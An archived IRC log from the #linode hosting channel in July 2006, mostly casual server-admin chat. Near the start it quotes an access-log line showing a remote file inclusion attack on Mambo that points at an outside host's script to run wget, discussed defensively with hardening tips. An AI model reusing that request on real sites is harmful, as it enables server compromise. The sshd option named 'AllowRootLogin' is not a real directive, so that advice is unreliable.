Back to Home / #linode / 2006 / 07 / Prev Day | Next Day
#linode IRC Logs for 2006-07-15

---Logopened Sat Jul 15 00:00:13 2006
---Daychanged Sat Jul 15 2006
00:00|-|Dreameer3 [~Dreamer3@0-1pool107-65.nas33.chicago3.il.us.da.qwest.net] has joined #linode
00:06|-|Dreamr_3 [~Dreamer3@0-1pool107-5.nas33.chicago3.il.us.da.qwest.net] has quit [Ping timeout: 480 seconds]
00:08<warewolf>wow.
00:08<warewolf>http://xpl.netmisphere2.com/CMD.gif is not a gif, nor is it friendly.
00:08<warewolf>again, I'm rather glad that I chroot my php apache.
00:08<eFUDd>hmmm
00:09<eFUDd>cha0s connect back!
00:09<warewolf>along with two local kernel exploits for linux
00:09<warewolf>ok
00:09<eFUDd>ayup
00:09<warewolf>in Apache
00:10<warewolf>if you don't have a "default" webserver, you're probally open to poorly written worms/exploits.
00:10<warewolf><VirtualHost 67.18.92.146:80>
00:10<warewolf> ServerName default.xabean.com
00:10<warewolf></VirtualHost>
00:10<eFUDd>eh?
00:10<warewolf>that's pretty much all it takes
00:10<warewolf>a vhost that is your dotted decimal IP address
00:10<warewolf>it takes all the HTTP requests that don't have a Host: header in them.
00:10<warewolf>all of today's browsers pass along a Host: header
00:11<eFUDd>oh. all o fmy vhosts are defined that way.
00:11<eFUDd>well, I have a * then specifics per IP
00:11<warewolf>it took me a while to figure the ordering out correctly
00:11<warewolf>apache 1.3 is picky about 'default' vhosts
00:12<eFUDd>195.86.124.210 - - [12/Jul/2006:10:58:00 -0400] "GET http://69.56.173.247/mambo/components/com_simpleboard/image_upload.php?sbp=http://xpl.netmisphere2.com/CMD.gif?cmd=wget HTTP/1.0" 404 311 "http://69.56.173.247/mambo/components/com_simpleboard/image_upload.php?sbp=http://xpl.netmisphere2.com/CMD.gif?cmd=wget"
00:12<eFUDd>heh.
00:12<warewolf>HEY
00:12<warewolf>QUIT PASTING MY LOGS!
00:12<warewolf>:P
00:12<eFUDd>:)
00:12<eFUDd>seems to be that same host.
00:12<warewolf>1) no wget under my php-enabled apache
00:12<warewolf>2) no GCC under my php-enabled apache
00:13<eFUDd>well, that GET wouldn't work anyway.
00:13<warewolf>mod_security is the shhizzle
00:13<warewolf>it's for mambo
00:13[~]eFUDd points out 404 in error response
00:13<warewolf>right right
00:13<warewolf>but if you had a vulnerable mambo there you'd be toast
00:13<eFUDd>Right.
00:13<eFUDd>which is why i don't use any of that shite.
00:13<eFUDd>:)
00:14[~]warewolf patpats fudd
00:14<eFUDd>altho there were 6 302... but still :)
00:14<warewolf>that's cause your apache was smarter than the 'sploit
00:14<eFUDd>i spent a bit of time getting my vhosts stuff done rite.
00:15<eFUDd>it migiht even /still/ be right. :)
00:15[~]warewolf nods
00:18<eFUDd>what bugs me more is that someone took the time to write some pretty good code for that CMD.gif and it's 'sploits.
00:18<eFUDd>I mean... put that skill to good use?
00:18<warewolf>know what you remind me of?
00:18<warewolf>a TV commercial.
00:18<warewolf>it went something like this
00:18[~]eFUDd blink
00:19<warewolf>"We develop new technology every day -- our engineers are some of the best. We have chip fab manufacturing plants stationed in four countries. We put billions of dollars into research..."
00:19|-|linbot [~supybot@ns.theshore.net] has quit [Ping timeout: 480 seconds]
00:19<warewolf>blah blah blah about how good the company is
00:20<eFUDd>hrm.
00:20<warewolf>"But instead of curing cancer, or world hunger, we make computer graphics chips. We're 3dfx."
00:20<eFUDd>Heh.
00:20<warewolf>(note who got swallowed up by nVidia)
00:21<eFUDd>think i'm gonna go upstairs and read+sleep.
00:21<eFUDd>argument with wife tonight gave me a headache.
00:21<warewolf>toodles.
00:21<warewolf>I have manga to read.
00:45|-|womble [~mpalmer@eth359.nsw.adsl.internode.on.net] has joined #linode
00:46|-|Spads [~crack@host-84-9-50-184.bulldogdsl.com] has quit [Ping timeout: 480 seconds]
00:49|-|netjackal [~netjackal@c-71-201-249-2.hsd1.il.comcast.net] has quit [Ping timeout: 480 seconds]
01:11|-|netjackal [~netjackal@c-71-201-249-2.hsd1.il.comcast.net] has joined #linode
01:26<warewolf>hmm.
01:26<warewolf>I wonder if 'Speaks POP3, IMAP, SMTP, FTP and HTTP.' is good to be on a resume.
01:37<womble>warewolf: Perhaps only if it's a resume for a Linux box...
02:29|-|netjackal [~netjackal@c-71-201-249-2.hsd1.il.comcast.net] has quit [Read error: Operation timed out]
02:59|-|asd [LinodeJava@catv-506237bc.catv.broadband.hu] has joined #linode
03:00|-|asd [LinodeJava@catv-506237bc.catv.broadband.hu] has quit [Quit: ]
04:53|-|jekil [~alessandr@151.82.4.89] has joined #linode
06:28|-|grant [~granty@ner-as13657.alshamil.net.ae] has joined #linode
07:28<heidi>Neurosis: no, it will cancel immediately
07:35|-|adamg [~misthos@83.67.206.110] has joined #linode
07:54<Neurosis>ok well what if i just say dont bill me again on the 1st
07:54<Neurosis>cuz im paid for this month already
08:23|-|netjackal [~netjackal@c-71-201-249-2.hsd1.il.comcast.net] has joined #linode
08:32|-|netjackal [~netjackal@c-71-201-249-2.hsd1.il.comcast.net] has quit [Ping timeout: 480 seconds]
08:42|-|grant [~granty@ner-as13657.alshamil.net.ae] has quit [Quit: crazy]
08:58|-|shakr [~kenn2@whirl.gellin.dyndns.org] has quit [Quit: Leaving]
09:03|-|netjackal [~netjackal@c-71-201-249-2.hsd1.il.comcast.net] has joined #linode
09:09|-|afv-13 [~afv-13@rkdp-ip-nas-1-p282.telkom-ipnet.co.za] has joined #linode
09:09<afv-13>thanks for the quick kernel update caker
09:16|-|shakr [~kenn2@whirl.gellin.dyndns.org] has joined #linode
09:20|-|afv-13 [~afv-13@rkdp-ip-nas-1-p282.telkom-ipnet.co.za] has quit [Read error: Connection reset by peer]
09:20|-|FireSlash [~FireSlash@166.214.3.28] has joined #linode
09:22|-|afv-13 [~afv-13@rkdp-ip-nas-1-p282.telkom-ipnet.co.za] has joined #linode
09:41|-|FireSlash [~FireSlash@166.214.3.28] has quit [Quit: Leaving]
10:21|-|afv-13 [~afv-13@rkdp-ip-nas-1-p282.telkom-ipnet.co.za] has quit [Quit: leaving]
10:43|-|afv-13 [~afv-13@rkdp-ip-nas-1-p282.telkom-ipnet.co.za] has joined #linode
11:17|-|anderiv [~anderiv@207-67-87-34.static.twtelecom.net] has quit [Server closed connection]
11:17|-|anderiv [~anderiv@207-67-87-34.static.twtelecom.net] has joined #linode
---Logclosed Sat Jul 15 11:48:29 2006
---Logopened Sat Jul 15 11:48:31 2006
11:48|-|mikegrb [~michael@mail.thegrebs.com] has joined #linode
11:48|-|Ekipa kanalu #linode: Wszystkich: 58 |-| +op [1] |-| +voice [0] |-| normalnych [57]
11:48|-|mode/#linode [+o mikegrb] by ChanServ
11:49|-|Kanal #linode zsynchronizowany w 48 sekundy
11:59|-|netjackal [~netjackal@c-71-201-249-2.hsd1.il.comcast.net] has quit [Ping timeout: 480 seconds]
12:02|-|Dreamr_3 [~Dreamer3@0-1pool106-218.nas33.chicago3.il.us.da.qwest.net] has joined #linode
12:07|-|Dreameer3 [~Dreamer3@0-1pool107-65.nas33.chicago3.il.us.da.qwest.net] has quit [Ping timeout: 480 seconds]
13:30|-|hotnikks [~starship@139.140.181.146] has joined #linode
14:22<eFUDd>http://forever.broked.net/~jason/images/helicopter
14:36|-|encode [~encode@blah.i.hate.w1ndo.ws] has quit [Server closed connection]
14:36|-|encode [~encode@blah.i.hate.w1ndo.ws] has joined #linode
14:39|-|Waldo [~4622e804@webuser.linode.com] has joined #linode
14:40<Waldo>Is there an easy way to see what software is installed in the linode for example using yum ?
14:45|-|Waldo [~4622e804@webuser.linode.com] has quit [Quit: CGI:IRC (Ping timeout)]
14:54|-|Spads [~crack@host-87-74-89-130.bulldogdsl.com] has joined #linode
15:22|-|jekil [~alessandr@151.82.4.89] has quit [Read error: Connection reset by peer]
15:33|-|warewolf [warewolf@warewolf.org] has quit [Server closed connection]
15:33|-|warewolf [warewolf@warewolf.org] has joined #linode
16:08|-|caker [~caker@caker.netrep.oftc.net] has quit [Server closed connection]
16:08|-|caker [~caker@ns.theshore.net] has joined #linode
16:34|-|Beirdo [~gjhurlbu@beirdo.usercloak.oftc.net] has quit [Server closed connection]
16:34|-|Beirdo [~gjhurlbu@beirdo.usercloak.oftc.net] has joined #linode
17:38|-|blorpy [~emad@67.64.149.13] has joined #linode
17:39<blorpy>npmr_: hi
17:43|-|nybble [~nybble@d150-156-24.home.cgocable.net] has quit [Quit: Leaving]
17:50|-|Spads [~crack@host-87-74-89-130.bulldogdsl.com] has quit [Ping timeout: 480 seconds]
17:54|-|adamg [~misthos@83.67.206.110] has quit [Ping timeout: 480 seconds]
17:54|-|bob_freeman [~chatzilla@83-216-137-154.oliver282.adsl.metronet.co.uk] has joined #linode
18:21|-|bob_freeman [~chatzilla@83-216-137-154.oliver282.adsl.metronet.co.uk] has quit [Quit: Chatzilla 0.9.73 [Firefox 1.5.0.4/2006050817]]
18:25<warewolf>vermellion hells, is it ever hot.,
18:31|-|netjackal [~netjackal@c-71-201-249-2.hsd1.il.comcast.net] has joined #linode
18:34|-|internat [~internat@mchax2-145.dialup.optusnet.com.au] has joined #linode
18:34<internat>stupid question, is there a way to disable in ssh root logins via passwords only allow key entry?
18:34<warewolf>yes.
18:35<warewolf>AllowRootLogin without-password # sets public-key auth only
18:35<internat>how?
18:35<warewolf>AllowRootLogin none # disable all
18:35<warewolf>man sshd
18:35<warewolf>and sshd_config
18:35|-|blorpy [~emad@67.64.149.13] has left #linode []
18:35<internat>oh sweet
18:36<internat>ooh
18:36<internat>forcedcommands.. thats the one i want
18:37<internat>and that will fix all of my problems :D
18:42<afv-13>is it possible to chrrot and keep some commands from the real system available on the chrooted system without installing them?
18:45<internat>cant you bind them in or something? i cant remember how but im sure i remember reading something about being able to bind stuff in a chroot or something close
18:46<afv-13>would be easier compiling it statically
18:46<internat>ah
18:47<afv-13>i'm trying to run unison in a chroot jail
18:47<afv-13>it's probably going to need some inetd config as well
18:49|-|netjackal [~netjackal@c-71-201-249-2.hsd1.il.comcast.net] has quit [Read error: Operation timed out]
18:53<internat>if u dont mind my stupidity, whats unison?
18:54<afv-13>file synchronizer
18:56<internat>ah ok :)
19:03<warewolf>unisom is a sleeping aid drug.
19:03<afv-13>i wouldn't mind some other that right about now
19:15|-|netjackal [~netjackal@c-71-201-249-2.hsd1.il.comcast.net] has joined #linode
19:27|-|mode/#linode [+o caker] by ChanServ
19:29|-|afv-13 [~afv-13@rkdp-ip-nas-1-p282.telkom-ipnet.co.za] has quit [Quit: leaving]
19:29|-|afv-13 [~afv-13@rkdp-ip-nas-1-p282.telkom-ipnet.co.za] has joined #linode
19:29|-|afv-13 [~afv-13@rkdp-ip-nas-1-p282.telkom-ipnet.co.za] has quit [Quit: ]
19:54|-|Xel [~matt@aurora.xelman.net] has joined #linode
19:54<Xel>What are the advantages of switching to the Xen servers? I don't know a whole lot about the advantages of Xen over UML.
19:59<TheFirst>they're zippier
20:07<Xel>Ohh see that answers my question exactluy
20:08<lucca>and less stable
20:10|-|afv-13 [~afv-13@rkdp-ip-nas-1-p282.telkom-ipnet.co.za] has joined #linode
20:28|-|netjackal [~netjackal@c-71-201-249-2.hsd1.il.comcast.net] has quit [Ping timeout: 480 seconds]
20:54|-|internat [~internat@mchax2-145.dialup.optusnet.com.au] has quit [Ping timeout: 480 seconds]
21:02<TheFirst>that's true
21:23|-|FireSlash [~FireSlash@166.214.25.195] has joined #linode
22:54<FireSlash>Hey guys. I love you. Just incase I hadn't mentioned that recenetly. :)
22:54<FireSlash>Changed credit cards, forgot to update...
22:54<FireSlash>And its like "HAY. UPDATE YOUR CREDIT CARD INFO PLZ. DO IT BEFORE THIS DATE. KTHNX."
22:55<@mikegrb>lolz
22:55<FireSlash>Instead of "HAY. WE CAN'T GET YUOR MONEYS. NO WEB FOR YOU. LOL."
22:58<@caker>FireSlash: in a few more days, it would have been the latter :)
22:59|-|VS_ChanLog [~stats@ns.theshore.net] has left #linode [Rotating Logs]
22:59|-|VS_ChanLog [~stats@ns.theshore.net] has joined #linode
22:59<FireSlash>caker, True, but the warning was hawtr
22:59<eFUDd>caker, http://forever.broked.net/~jason/images/helicopter (not that you care. but... i do!)
23:00<@caker>eFUDd: yeah, saw them earlier, nice stuff .. anodized parts and whatnot
23:00<eFUDd>ah. nod.
23:00[~]caker looks again
23:00<eFUDd>bout to order another kit to have spares on hand.
23:05|-|netjackal [~netjackal@c-71-201-249-2.hsd1.il.comcast.net] has joined #linode
23:35|-|Neurosis [~ox3de@ip68-8-188-145.sd.sd.cox.net] has quit [Read error: Connection reset by peer]
23:53|-|kavonr [~kavonr@user-11fa4mb.dsl.mindspring.com] has joined #linode
23:53|-|spr [~spr@c-67-169-251-207.hsd1.ut.comcast.net] has joined #linode
23:55<kavonr>hi folks
23:59<kavonr>Is the "out of linodes" stuff on the website out of date?
23:59<eFUDd>!avail
23:59<eFUDd>linbot, avail?
23:59[~]eFUDd whatevers
23:59<kavonr>ah, none available yet. le sigh. :)
---Logclosed Sun Jul 16 00:00:11 2006